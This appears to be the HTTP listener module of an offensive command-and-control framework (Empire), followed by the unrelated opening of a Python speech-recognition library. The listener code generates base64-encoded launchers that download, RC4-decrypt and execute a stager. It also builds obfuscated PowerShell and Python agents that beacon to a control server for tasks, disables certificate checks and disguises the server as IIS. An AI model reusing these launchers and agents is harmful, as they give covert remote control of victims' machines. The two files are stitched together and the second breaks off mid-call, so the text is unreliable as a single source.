launcherBase += "req.add_header(\"%s\",\"%s\");\n" % (headerKey, headerValue)
if proxy.lower() != "none":
if proxy.lower() == "default":
launcherBase += "proxy = urllib.request.ProxyHandler();\n"
else:
proto = proxy.split(':')[0]
launcherBase += "proxy = urllib.request.ProxyHandler({'" + proto + "':'" + proxy + "'});\n"
if proxyCreds != "none":
if proxyCreds == "default":
launcherBase += "o = urllib.request.build_opener(proxy);\n"
# add the RC4 packet to a cookie
launcherBase += "o.addheaders=[('User-Agent',UA), (\"Cookie\", \"session=%s\")];\n" % (
b64RoutingPacket)
else:
launcherBase += "proxy_auth_handler = urllib.request.ProxyBasicAuthHandler();\n"
username = proxyCreds.split(':')[0]
password = proxyCreds.split(':')[1]
launcherBase += "proxy_auth_handler.add_password(None,'" + proxy + "','" + username + "','" + password + "');\n"
launcherBase += "o = urllib.request.build_opener(proxy, proxy_auth_handler);\n"
# add the RC4 packet to a cookie
launcherBase += "o.addheaders=[('User-Agent',UA), (\"Cookie\", \"session=%s\")];\n" % (
b64RoutingPacket)
else:
launcherBase += "o = urllib.request.build_opener(proxy);\n"
else:
launcherBase += "o = urllib.request.build_opener();\n"
# install proxy and creds globally, so they can be used with urlopen.
launcherBase += "urllib.request.install_opener(o);\n"
# download the stager and extract the IV
launcherBase += "a=urllib.request.urlopen(req).read();\n"
launcherBase += "IV=a[0:4];"
launcherBase += "data=a[4:];"
launcherBase += "key=IV+'%s'.encode('UTF-8');" % (stagingKey)
# RC4 decryption
launcherBase += "S,j,out=list(range(256)),0,[]\n"
launcherBase += "for i in list(range(256)):\n"
launcherBase += " j=(j+S[i]+key[i%len(key)])%256\n"
launcherBase += " S[i],S[j]=S[j],S[i]\n"
launcherBase += "i=j=0\n"
launcherBase += "for char in data:\n"
launcherBase += " i=(i+1)%256\n"
launcherBase += " j=(j+S[i])%256\n"
launcherBase += " S[i],S[j]=S[j],S[i]\n"
launcherBase += " out.append(chr(char^S[(S[i]+S[j])%256]))\n"
launcherBase += "exec(''.join(out))"
if encode:
launchEncoded = base64.b64encode(launcherBase.encode('UTF-8')).decode('UTF-8')
if isinstance(launchEncoded, bytes):
launchEncoded = launchEncoded.decode('UTF-8')
launcher = "echo \"import sys,base64,warnings;warnings.filterwarnings(\'ignore\');exec(base64.b64decode('%s'));\" | python3 &" % (
launchEncoded)
return launcher
else:
return launcherBase
#very basic csharp implementation
if language.startswith("csh"):
workingHours = listenerOptions['WorkingHours']['Value']
killDate = listenerOptions['KillDate']['Value']
customHeaders = profile.split('|')[2:]
delay = listenerOptions['DefaultDelay']['Value']
jitter = listenerOptions['DefaultJitter']['Value']
lostLimit = listenerOptions['DefaultLostLimit']['Value']
with open(self.mainMenu.installPath + "/stagers/Sharpire.yaml", "rb") as f:
stager_yaml = f.read()
stager_yaml = stager_yaml.decode("UTF-8")
stager_yaml = stager_yaml \
.replace("{{ REPLACE_ADDRESS }}", host) \
.replace("{{ REPLACE_SESSIONKEY }}", stagingKey) \
.replace("{{ REPLACE_PROFILE }}", profile) \
.replace("{{ REPLACE_WORKINGHOURS }}", workingHours) \
.replace("{{ REPLACE_KILLDATE }}", killDate) \
.replace("{{ REPLACE_DELAY }}", str(delay)) \
.replace("{{ REPLACE_JITTER }}", str(jitter)) \
.replace("{{ REPLACE_LOSTLIMIT }}", str(lostLimit))
compiler = self.mainMenu.loadedPlugins.get("csharpserver")
if not compiler.status == 'ON':
print(helpers.color('[!] csharpserver plugin not running'))
else:
file_name = compiler.do_send_stager(stager_yaml, "Sharpire")
return file_name
else:
print(helpers.color(
"[!] listeners/http generate_launcher(): invalid language specification: only 'powershell' and 'python' are currently supported for this module."))
else:
print(helpers.color("[!] listeners/http generate_launcher(): invalid listener name specification!"))
def generate_stager(self, listenerOptions, encode=False, encrypt=True, obfuscate=False, obfuscationCommand="",
language=None):
"""
Generate the stager code needed for communications with this listener.
"""
if not language:
print(helpers.color('[!] listeners/http generate_stager(): no language specified!'))
return None
profile = listenerOptions['DefaultProfile']['Value']
uris = [a.strip('/') for a in profile.split('|')[0].split(',')]
launcher = listenerOptions['Launcher']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
workingHours = listenerOptions['WorkingHours']['Value']
killDate = listenerOptions['KillDate']['Value']
host = listenerOptions['Host']['Value']
customHeaders = profile.split('|')[2:]
# select some random URIs for staging from the main profile
stage1 = random.choice(uris)
stage2 = random.choice(uris)
if language.lower() == 'powershell':
# read in the stager base
with open("%s/data/agent/stagers/http.ps1" % (self.mainMenu.installPath)) as f:
stager = f.read()
# Get the random function name generated at install and patch the stager with the proper function name
stager = data_util.keyword_obfuscation(stager)
# make sure the server ends with "/"
if not host.endswith("/"):
host += "/"
# Patch in custom Headers
remove = []
if customHeaders != []:
for key in customHeaders:
value = key.split(":")
if 'cookie' in value[0].lower() and value[1]:
continue
remove += value
headers = ','.join(remove)
# headers = ','.join(customHeaders)
stager = stager.replace("$customHeaders = \"\";", "$customHeaders = \"" + headers + "\";")
# patch in working hours, if any
if workingHours != "":
stager = stager.replace('WORKING_HOURS_REPLACE', workingHours)
# Patch in the killdate, if any
if killDate != "":
stager = stager.replace('REPLACE_KILLDATE', killDate)
# patch the server and key information
stager = stager.replace('REPLACE_SERVER', host)
stager = stager.replace('REPLACE_STAGING_KEY', stagingKey)
stager = stager.replace('index.jsp', stage1)
stager = stager.replace('index.php', stage2)
randomizedStager = ''
# forces inputs into a bytestring to ensure 2/3 compatibility
stagingKey = stagingKey.encode('UTF-8')
#stager = stager.encode('UTF-8')
#randomizedStager = randomizedStager.encode('UTF-8')
for line in stager.split("\n"):
line = line.strip()
# skip commented line
if not line.startswith("#"):
# randomize capitalization of lines without quoted strings
if "\"" not in line:
randomizedStager += helpers.randomize_capitalization(line)
else:
randomizedStager += line
if obfuscate:
randomizedStager = helpers.obfuscate(self.mainMenu.installPath, randomizedStager,
obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
# There doesn't seem to be any conditions in which the encrypt flag isn't set so the other
# if/else statements are irrelevant
if encode:
return helpers.enc_powershell(randomizedStager)
elif encrypt:
RC4IV = os.urandom(4)
return RC4IV + encryption.rc4(RC4IV + stagingKey, randomizedStager.encode('UTF-8'))
else:
# otherwise just return the case-randomized stager
return randomizedStager
elif language.lower() == 'python':
template_path = [
os.path.join(self.mainMenu.installPath, '/data/agent/stagers'),
os.path.join(self.mainMenu.installPath, './data/agent/stagers')]
eng = templating.TemplateEngine(template_path)
template = eng.get_template('http.py')
template_options = {
'working_hours': workingHours,
'kill_date': killDate,
'staging_key': stagingKey,
'profile': profile,
'stage_1': stage1,
'stage_2': stage2
}
stager = template.render(template_options)
# base64 encode the stager and return it
if encode:
return base64.b64encode(stager)
if encrypt:
# return an encrypted version of the stager ("normal" staging)
RC4IV = os.urandom(4)
return RC4IV + encryption.rc4(RC4IV + stagingKey.encode('UTF-8'), stager.encode('UTF-8'))
else:
# otherwise return the standard stager
return stager
else:
print(helpers.color(
"[!] listeners/http generate_stager(): invalid language specification, only 'powershell' and 'python' are currently supported for this module."))
def generate_agent(self, listenerOptions, language=None, obfuscate=False, obfuscationCommand="", version=''):
"""
Generate the full agent code needed for communications with this listener.
"""
if not language:
print(helpers.color('[!] listeners/http generate_agent(): no language specified!'))
return None
language = language.lower()
delay = listenerOptions['DefaultDelay']['Value']
jitter = listenerOptions['DefaultJitter']['Value']
profile = listenerOptions['DefaultProfile']['Value']
lostLimit = listenerOptions['DefaultLostLimit']['Value']
killDate = listenerOptions['KillDate']['Value']
workingHours = listenerOptions['WorkingHours']['Value']
b64DefaultResponse = base64.b64encode(self.default_response().encode('UTF-8'))
if language == 'powershell':
with open(self.mainMenu.installPath + "/data/agent/agent.ps1") as f:
code = f.read()
# Get the random function name generated at install and patch the stager with the proper function name
code = data_util.keyword_obfuscation(code)
# patch in the comms methods
commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language)
code = code.replace('REPLACE_COMMS', commsCode)
# strip out comments and blank lines
code = helpers.strip_powershell_comments(code)
# patch in the delay, jitter, lost limit, and comms profile
code = code.replace('$AgentDelay = 60', "$AgentDelay = " + str(delay))
code = code.replace('$AgentJitter = 0', "$AgentJitter = " + str(jitter))
code = code.replace(
'$Profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"',
"$Profile = \"" + str(profile) + "\"")
code = code.replace('$LostLimit = 60', "$LostLimit = " + str(lostLimit))
code = code.replace('$DefaultResponse = ""', '$DefaultResponse = "' + b64DefaultResponse.decode('UTF-8') + '"')
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('$KillDate,', "$KillDate = '" + str(killDate) + "',")
if obfuscate:
code = helpers.obfuscate(self.mainMenu.installPath, code, obfuscationCommand=obfuscationCommand)
return code
elif language == 'python':
if version == 'ironpython':
f = open(self.mainMenu.installPath + "/data/agent/ironpython_agent.py")
else:
f = open(self.mainMenu.installPath + "/data/agent/agent.py")
code = f.read()
f.close()
# patch in the comms methods
commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language)
code = code.replace('REPLACE_COMMS', commsCode)
# strip out comments and blank lines
code = helpers.strip_python_comments(code)
# patch in the delay, jitter, lost limit, and comms profile
code = code.replace('delay = 60', 'delay = %s' % (delay))
code = code.replace('jitter = 0.0', 'jitter = %s' % (jitter))
code = code.replace(
'profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"',
'profile = "%s"' % (profile))
code = code.replace('lostLimit = 60', 'lostLimit = %s' % (lostLimit))
code = code.replace('defaultResponse = base64.b64decode("")',
'defaultResponse = base64.b64decode("%s")' % (b64DefaultResponse.decode("UTF-8")))
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('killDate = ""', 'killDate = "%s"' % (killDate))
if workingHours != "":
code = code.replace('workingHours = ""', 'workingHours = "%s"' % (killDate))
return code
elif language == "csharp":
#currently the agent is stagless so do nothing
code = ""
return code
else:
print(helpers.color(
"[!] listeners/http generate_agent(): invalid language specification, only 'powershell', 'python', & 'csharp' are currently supported for this module."))
def generate_comms(self, listenerOptions, language=None):
"""
Generate just the agent communication code block needed for communications with this listener.
This is so agents can easily be dynamically updated for the new listener.
"""
if language:
if language.lower() == 'powershell':
updateServers = """
$Script:ControlServers = @("%s");
$Script:ServerIndex = 0;
""" % (listenerOptions['Host']['Value'])
if listenerOptions['Host']['Value'].startswith('https'):
updateServers += "\n[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
getTask = """
$script:GetTask = {
try {
if ($Script:ControlServers[$Script:ServerIndex].StartsWith("http")) {
# meta 'TASKING_REQUEST' : 4
$RoutingPacket = New-RoutingPacket -EncData $Null -Meta 4
$RoutingCookie = [Convert]::ToBase64String($RoutingPacket)
# build the web request object
$""" + helpers.generate_random_script_var_name("wc") + """ = New-Object System.Net.WebClient
# set the proxy settings for the WC to be the default system settings
$""" + helpers.generate_random_script_var_name("wc") + """.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$""" + helpers.generate_random_script_var_name("wc") + """.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
if($Script:Proxy) {
$""" + helpers.generate_random_script_var_name("wc") + """.Proxy = $Script:Proxy;
}
$""" + helpers.generate_random_script_var_name("wc") + """.Headers.Add("User-Agent",$script:UserAgent)
$script:Headers.GetEnumerator() | % {$""" + helpers.generate_random_script_var_name(
"wc") + """.Headers.Add($_.Name, $_.Value)}
$""" + helpers.generate_random_script_var_name(
"wc") + """.Headers.Add("Cookie",\"""" + self.session_cookie + """session=$RoutingCookie")
# choose a random valid URI for checkin
$taskURI = $script:TaskURIs | Get-Random
$result = $""" + helpers.generate_random_script_var_name("wc") + """.DownloadData($Script:ControlServers[$Script:ServerIndex] + $taskURI)
$result
}
}
catch [Net.WebException] {
$script:MissedCheckins += 1
if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
# restart key negotiation
Start-Negotiate -S "$ser" -SK $SK -UA $ua
}
}
}
"""
sendMessage = """
$script:SendMessage = {
param($Packets)
if($Packets) {
# build and encrypt the response packet
$EncBytes = Encrypt-Bytes $Packets
# build the top level RC4 "routing packet"
# meta 'RESULT_POST' : 5
$RoutingPacket = New-RoutingPacket -EncData $EncBytes -Meta 5
if($Script:ControlServers[$Script:ServerIndex].StartsWith('http')) {
# build the web request object
$""" + helpers.generate_random_script_var_name("wc") + """ = New-Object System.Net.WebClient
# set the proxy settings for the WC to be the default system settings
$""" + helpers.generate_random_script_var_name("wc") + """.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$""" + helpers.generate_random_script_var_name("wc") + """.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
if($Script:Proxy) {
$""" + helpers.generate_random_script_var_name("wc") + """.Proxy = $Script:Proxy;
}
$""" + helpers.generate_random_script_var_name("wc") + """.Headers.Add('User-Agent', $Script:UserAgent)
$Script:Headers.GetEnumerator() | ForEach-Object {$""" + helpers.generate_random_script_var_name(
"wc") + """.Headers.Add($_.Name, $_.Value)}
try {
# get a random posting URI
$taskURI = $Script:TaskURIs | Get-Random
$response = $""" + helpers.generate_random_script_var_name("wc") + """.UploadData($Script:ControlServers[$Script:ServerIndex]+$taskURI, 'POST', $RoutingPacket);
}
catch [System.Net.WebException]{
# exception posting data...
if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
# restart key negotiation
Start-Negotiate -S "$ser" -SK $SK -UA $ua
}
}
}
}
}
"""
return updateServers + getTask + sendMessage
elif language.lower() == 'python':
updateServers = "server = '%s'\n" % (listenerOptions['Host']['Value'])
if listenerOptions['Host']['Value'].startswith('https'):
updateServers += "hasattr(ssl, '_create_unverified_context') and ssl._create_unverified_context() or None"
# Import sockschain code
f = open(self.mainMenu.installPath + "/data/agent/stagers/common/sockschain.py")
socks_import = f.read()
f.close()
sendMessage = f"""
def update_proxychain(proxy_list):
setdefaultproxy() # Clear the default chain
for proxy in proxy_list:
addproxy(proxytype=proxy['proxytype'], addr=proxy['addr'], port=proxy['port'])
def send_message(packets=None):
# Requests a tasking or posts data to a randomized tasking URI.
# If packets == None, the agent GETs a tasking from the control server.
# If packets != None, the agent encrypts the passed packets and
# POSTs the data to the control server.
global missedCheckins
global server
global headers
global taskURIs
data = None
if packets:
# aes_encrypt_then_hmac is in stager.py
encData = aes_encrypt_then_hmac(key, packets)
data = build_routing_packet(stagingKey, sessionID, meta=5, encData=encData)
else:
# if we're GETing taskings, then build the routing packet to stuff info a cookie first.
# meta TASKING_REQUEST = 4
routingPacket = build_routing_packet(stagingKey, sessionID, meta=4)
b64routingPacket = base64.b64encode(routingPacket).decode('UTF-8')
headers['Cookie'] = "{self.session_cookie}session=%s" % (b64routingPacket)
taskURI = random.sample(taskURIs, 1)[0]
requestUri = server + taskURI
try:
wrapmodule(urllib.request)
data = (urllib.request.urlopen(urllib.request.Request(requestUri, data, headers))).read()
return ('200', data)
except urllib.request.HTTPError as HTTPError:
# if the server is reached, but returns an error (like 404)
missedCheckins = missedCheckins + 1
#if signaled for restaging, exit.
if HTTPError.code == 401:
sys.exit(0)
return (HTTPError.code, '')
except urllib.request.URLError as URLerror:
# if the server cannot be reached
missedCheckins = missedCheckins + 1
return (URLerror.reason, '')
return ('', '')
"""
return socks_import + updateServers + sendMessage
else:
print(helpers.color(
"[!] listeners/http generate_comms(): invalid language specification, only 'powershell' and 'python' are currently supported for this module."))
else:
print(helpers.color('[!] listeners/http generate_comms(): no language specified!'))
def start_server(self, listenerOptions):
"""
Threaded function that actually starts up the Flask server.
"""
# make a copy of the currently set listener options for later stager/agent generation
listenerOptions = copy.deepcopy(listenerOptions)
# suppress the normal Flask output
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)
bindIP = listenerOptions['BindIP']['Value']
host = listenerOptions['Host']['Value']
port = listenerOptions['Port']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
stagerURI = listenerOptions['StagerURI']['Value']
userAgent = self.options['UserAgent']['Value']
listenerName = self.options['Name']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
app = Flask(__name__)
self.app = app
# Set HTTP/1.1 as in IIS 7.5 instead of /1.0
WSGIRequestHandler.protocol_version = "HTTP/1.1"
@app.route('/download/<stager>')
def send_stager(stager):
if 'po' in stager:
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='powershell', encode=False,
userAgent=userAgent, proxy=proxy,
proxyCreds=proxyCreds)
return launcher
elif 'py' in stager:
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='python', encode=False,
userAgent=userAgent, proxy=proxy,
proxyCreds=proxyCreds)
return launcher
else:
return make_response(self.default_response(), 404)
@app.before_request
def check_ip():
"""
Before every request, check if the IP address is allowed.
"""
if not self.mainMenu.agents.is_ip_allowed(request.remote_addr):
listenerName = self.options['Name']['Value']
message = "[!] {} on the blacklist/not on the whitelist requested resource".format(request.remote_addr)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
return make_response(self.default_response(), 404)
@app.after_request
def change_header(response):
"Modify the headers response server."
headers = listenerOptions['Headers']['Value']
for key in headers.split("|"):
value = key.split(":")
response.headers[value[0]] = value[1]
return response
@app.after_request
def add_proxy_headers(response):
"Add HTTP headers to avoid proxy caching."
response.headers['Cache-Control'] = "no-cache, no-store, must-revalidate"
response.headers['Pragma'] = "no-cache"
response.headers['Expires'] = "0"
return response
@app.errorhandler(405)
def handle_405(e):
"""
Returns IIS 7.5 405 page for every Flask 405 error.
"""
return make_response(self.method_not_allowed_page(), 405)
@app.route('/')
@app.route('/iisstart.htm')
def serve_index():
"""
Return default server web page if user navigates to index.
"""
static_dir = self.mainMenu.installPath + "/data/misc/"
return make_response(self.index_page(), 200)
@app.route('/<path:request_uri>', methods=['GET'])
def handle_get(request_uri):
"""
Handle an agent GET request.
This is used during the first step of the staging process,
and when the agent requests taskings.
"""
if request_uri.lower() == 'welcome.png':
# Serves image loaded by index page.
#
# Thanks to making it case-insensitive it works the same way as in
# an actual IIS server
static_dir = self.mainMenu.installPath + "/data/misc/"
return send_from_directory(static_dir, 'welcome.png')
clientIP = request.remote_addr
listenerName = self.options['Name']['Value']
message = "[*] GET request for {}/{} from {}".format(request.host, request_uri, clientIP)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
routingPacket = None
cookie = request.headers.get('Cookie')
if cookie and cookie != '':
try:
# see if we can extract the 'routing packet' from the specified cookie location
# NOTE: this can be easily moved to a paramter, another cookie value, etc.
if self.session_cookie in cookie:
listenerName = self.options['Name']['Value']
message = "[*] GET cookie value from {} : {}".format(clientIP, cookie)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
cookieParts = cookie.split(';')
for part in cookieParts:
if part.startswith(self.session_cookie):
base64RoutingPacket = part[part.find('=') + 1:]
# decode the routing packet base64 value in the cookie
routingPacket = base64.b64decode(base64RoutingPacket)
except Exception as e:
routingPacket = None
pass
if routingPacket:
# parse the routing packet and process the results
dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, routingPacket, listenerOptions,
clientIP)
if dataResults and len(dataResults) > 0:
for (language, results) in dataResults:
if results:
if isinstance(results, str):
results = results.encode('UTF-8')
if results == b'STAGE0':
# handle_agent_data() signals that the listener should return the stager.ps1 code
# step 2 of negotiation -> return stager.ps1 (stage 1)
listenerName = self.options['Name']['Value']
message = "[*] Sending {} stager (stage 1) to {}".format(language, clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
stage = self.generate_stager(language=language, listenerOptions=listenerOptions,
obfuscate=self.mainMenu.obfuscate,
obfuscationCommand=self.mainMenu.obfuscateCommand)
return make_response(stage, 200)
elif results.startswith(b'ERROR:'):
listenerName = self.options['Name']['Value']
message = "[!] Error from agents.handle_agent_data() for {} from {}: {}".format(
request_uri, clientIP, results)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
if b'not in cache' in results:
# signal the client to restage
print(helpers.color("[*] Orphaned agent from %s, signaling restaging" % (clientIP)))
return make_response(self.default_response(), 401)
else:
return make_response(self.default_response(), 200)
else:
# actual taskings
listenerName = self.options['Name']['Value']
message = "[*] Agent from {} retrieved taskings".format(clientIP)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
return make_response(results, 200)
else:
# dispatcher.send("[!] Results are None...", sender='listeners/http')
return make_response(self.default_response(), 200)
else:
return make_response(self.default_response(), 200)
else:
listenerName = self.options['Name']['Value']
message = "[!] {} requested by {} with no routing packet.".format(request_uri, clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
return make_response(self.default_response(), 404)
@app.route('/<path:request_uri>', methods=['POST'])
def handle_post(request_uri):
"""
Handle an agent POST request.
"""
stagingKey = listenerOptions['StagingKey']['Value']
clientIP = request.remote_addr
requestData = request.get_data()
listenerName = self.options['Name']['Value']
message = "[*] POST request data length from {} : {}".format(clientIP, len(requestData))
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
# the routing packet should be at the front of the binary request.data
# NOTE: this can also go into a cookie/etc.
dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, requestData, listenerOptions, clientIP)
if dataResults and len(dataResults) > 0:
for (language, results) in dataResults:
if isinstance(results, str):
results = results.encode('UTF-8')
if results:
if results.startswith(b'STAGE2'):
# TODO: document the exact results structure returned
if ':' in clientIP:
clientIP = '[' + str(clientIP) + ']'
sessionID = results.split(b' ')[1].strip().decode('UTF-8')
sessionKey = self.mainMenu.agents.agents[sessionID]['sessionKey']
listenerName = self.options['Name']['Value']
message = "[*] Sending agent (stage 2) to {} at {}".format(sessionID, clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
hopListenerName = request.headers.get('Hop-Name')
# Check for hop listener
hopListener = data_util.get_listener_options(hopListenerName)
tempListenerOptions = copy.deepcopy(listenerOptions)
if hopListener is not None:
tempListenerOptions['Host']['Value'] = hopListener.options['Host']['Value']
else:
tempListenerOptions = listenerOptions
session_info = Session().query(models.Agent).filter(models.Agent.session_id == sessionID).first()
if session_info.language == 'ironpython':
version = 'ironpython'
else:
version = ''
# step 6 of negotiation -> server sends patched agent.ps1/agent.py
agentCode = self.generate_agent(language=language, listenerOptions=tempListenerOptions,
obfuscate=self.mainMenu.obfuscate,
obfuscationCommand=self.mainMenu.obfuscateCommand,
version=version)
encryptedAgent = encryption.aes_encrypt_then_hmac(sessionKey, agentCode)
# TODO: wrap ^ in a routing packet?
return make_response(encryptedAgent, 200)
elif results[:10].lower().startswith(b'error') or results[:10].lower().startswith(b'exception'):
listenerName = self.options['Name']['Value']
message = "[!] Error returned for results by {} : {}".format(clientIP, results)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
return make_response(self.default_response(), 404)
elif results.startswith(b'VALID'):
listenerName = self.options['Name']['Value']
message = "[*] Valid results returned by {}".format(clientIP)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
return make_response(self.default_response(), 200)
else:
return make_response(results, 200)
else:
return make_response(self.default_response(), 404)
else:
return make_response(self.default_response(), 404)
try:
certPath = listenerOptions['CertPath']['Value']
host = listenerOptions['Host']['Value']
if certPath.strip() != '' and host.startswith('https'):
certPath = os.path.abspath(certPath)
pyversion = sys.version_info
# support any version of tls
pyversion = sys.version_info
if pyversion[0] == 2 and pyversion[1] == 7 and pyversion[2] >= 13:
proto = ssl.PROTOCOL_TLS
elif pyversion[0] >= 3:
proto = ssl.PROTOCOL_TLS
else:
proto = ssl.PROTOCOL_SSLv23
context = ssl.SSLContext(proto)
context.load_cert_chain("%s/empire-chain.pem" % (certPath), "%s/empire-priv.key" % (certPath))
cipherlist_tls12 = ["ECDHE-RSA-AES256-GCM-SHA384", "ECDHE-RSA-AES128-GCM-SHA256", "ECDHE-RSA-AES256-SHA384", "AES256-SHA256", "AES128-SHA256"]
cipherlist_tls10 = ["ECDHE-RSA-AES256-SHA"]
selectciph = random.choice(cipherlist_tls12)+':'+random.choice(cipherlist_tls10)
context.set_ciphers(selectciph)
app.run(host=bindIP, port=int(port), threaded=True, ssl_context=context)
else:
app.run(host=bindIP, port=int(port), threaded=True)
except Exception as e:
print(helpers.color("[!] Listener startup on port %s failed: %s " % (port, e)))
listenerName = self.options['Name']['Value']
message = "[!] Listener startup on port {} failed: {}".format(port, e)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
def start(self, name=''):
"""
Start a threaded instance of self.start_server() and store it in the
self.threads dictionary keyed by the listener name.
"""
listenerOptions = self.options
if name and name != '':
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(1)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
else:
name = listenerOptions['Name']['Value']
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(1)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
def shutdown(self, name=''):
"""
Terminates the server thread stored in the self.threads dictionary,
keyed by the listener name.
"""
if name and name != '':
print(helpers.color("[!] Killing listener '%s'" % (name)))
self.threads[name].kill()
else:
print(helpers.color("[!] Killing listener '%s'" % (self.options['Name']['Value'])))
self.threads[self.options['Name']['Value']].kill()
def generate_cookie(self):
"""
Generate Cookie
"""
chars = string.ascii_letters
cookie = helpers.random_string(random.randint(6, 16), charset=chars)
return cookie
|
__init__.py
|
#!/usr/bin/env python3
"""Library for performing speech recognition, with support for several engines and APIs, online and offline."""
import io
import os
import subprocess
import wave
import aifc
import math
import audioop
import collections
import json
import base64
import threading
import platform
import stat
import hashlib
import hmac
import time
import uuid
import tempfile
import shutil
__author__ = "Anthony Zhang (Uberi)"
__version__ = "3.5.0"
__license__ = "BSD"
try: # attempt to use the Python 2 modules
from urllib import urlencode
from urllib2 import Request, urlopen, URLError, HTTPError
except ImportError: # use the Python 3 modules
from urllib.parse import urlencode
from urllib.request import Request, urlopen
from urllib.error import URLError, HTTPError
class WaitTimeoutError(Exception): pass
class RequestError(Exception): pass
class UnknownValueError(Exception): pass
class AudioSource(object):
def __init__(self):
raise NotImplementedError("this is an abstract class")
def __enter__(self):
raise NotImplementedError("this is an abstract class")
def __exit__(self, exc_type, exc_value, traceback):
raise NotImplementedError("this is an abstract class")
class Microphone(AudioSource):
"""
Creates a new ``Microphone`` instance, which represents a physical microphone on the computer. Subclass of ``AudioSource``.
This will throw an ``AttributeError`` if you don't have PyAudio 0.2.9 or later installed.
If ``device_index`` is unspecified or ``None``, the default microphone is used as the audio source. Otherwise, ``device_index`` should be the index of the device to use for audio input.
A device index is an integer between 0 and ``pyaudio.get_device_count() - 1`` (assume we have used ``import pyaudio`` beforehand) inclusive. It represents an audio device such as a microphone or speaker. See the `PyAudio documentation <http://people.csail.mit.edu/hubert/pyaudio/docs/>`__ for more details.
The microphone audio is recorded in chunks of ``chunk_size`` samples, at a rate of ``sample_rate`` samples per second (Hertz).
Higher ``sample_rate`` values result in better audio quality, but also more bandwidth (and therefore, slower recognition). Additionally, some machines, such as some Raspberry Pi models, can't keep up if this value is too high.
Higher ``chunk_size`` values help avoid triggering on rapidly changing ambient noise, but also makes detection less sensitive. This value, generally, should be left at its default.
"""
def __init__(self, device_index=None, sample_rate=16000, chunk_size=1024):
# set up PyAudio
self.pyaudio_module = self.get_pyaudio()
assert device_index is None or isinstance(device_index, int), "Device index must be None or an integer"
if device_index is not None: # ensure device index is in range
audio = self.pyaudio_module.PyAudio()
try:
count = audio.get_device_count() # obtain device count
except:
audio.terminate()
raise
assert 0 <= device_index < count, "Device index out of range ({} devices available; device index should be between 0 and {} inclusive)".format(count, count - 1)
assert isinstance(sample_rate, int) and sample_rate > 0, "Sample rate must be a positive integer"
assert isinstance(chunk_size, int) and chunk_size > 0, "Chunk size must be a positive integer"
self.device_index = device_index
self.format = self.pyaudio_module.paInt16 # 16-bit int sampling
self.SAMPLE_WIDTH = self.pyaudio_module.get_sample_size(self.format) # size of each sample
self.SAMPLE_RATE = sample_rate # sampling rate in Hertz
self.CHUNK = chunk_size # number of frames stored in each buffer
self.audio = None
self.stream = None
@staticmethod
def get_pyaudio():
"""
Imports the pyaudio module and checks its version. Throws exceptions if pyaudio can't be found or a wrong version is installed
"""
try:
import pyaudio
except ImportError:
raise AttributeError("Could not find PyAudio; check installation")
from distutils.version import LooseVersion
if LooseVersion(pyaudio.__version__) < LooseVersion("0.2.9"):
raise AttributeError("PyAudio 0.2.9 or later is required (found version {})".format(pyaudio.__version__))
return pyaudio
@staticmethod
def list_microphone_names():
"""
Returns a list of the names of all available microphones. For microphones where the name can't be retrieved, the list entry contains ``None`` instead.
The index of each microphone's name is the same as its device index when creating a ``Microphone`` instance - indices in this list can be used as values of ``device_index``.
"""
audio = Microphone.get_pyaudio().PyAudio()
try:
result = []
for i in range(audio.get_device_count()):
device_info = audio.get_device_info_by_index(i)
result.append(device_info.get("name"))
finally:
audio.terminate()
return result
def __enter__(self):
assert self.stream is None, "This audio source is already inside a context manager"
self.audio = self.pyaudio_module.PyAudio()
try:
self.stream = Microphone.MicrophoneStream(
self.audio.open(
input_device_index=self.device_index, channels=1,
